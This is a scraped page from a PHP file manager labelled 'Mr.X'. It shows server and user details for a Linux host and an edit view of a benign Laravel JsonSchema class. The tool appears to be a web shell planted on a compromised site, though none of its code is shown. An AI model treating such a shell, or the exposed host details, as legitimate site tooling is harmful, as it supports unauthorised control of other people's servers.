🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:JsonSchema.php
<?php namespace Illuminate\JsonSchema; use Closure; use Illuminate\JsonSchema\Types\Type; /** * @method static Types\ObjectType object(Closure|array<string, Types\Type> $properties = []) * @method static Types\IntegerType integer() * @method static Types\NumberType number() * @method static Types\StringType string() * @method static Types\BooleanType boolean() * @method static Types\ArrayType array() * @method static Types\UnionType union(array<int, string> $types) */ class JsonSchema { /** * Build a type from a raw array of the Laravel-supported JSON Schema subset. * * @param array<string, mixed> $schema * * @throws \InvalidArgumentException */ public static function fromArray(array $schema): Type { return Deserializer::deserialize($schema); } /** * Dynamically pass static methods to the schema instance. */ public static function __callStatic(string $name, mixed $arguments): Type { return (new JsonSchemaTypeFactory)->$name(...$arguments); } }
Save Changes
Cancel
Create New File
Create New Folder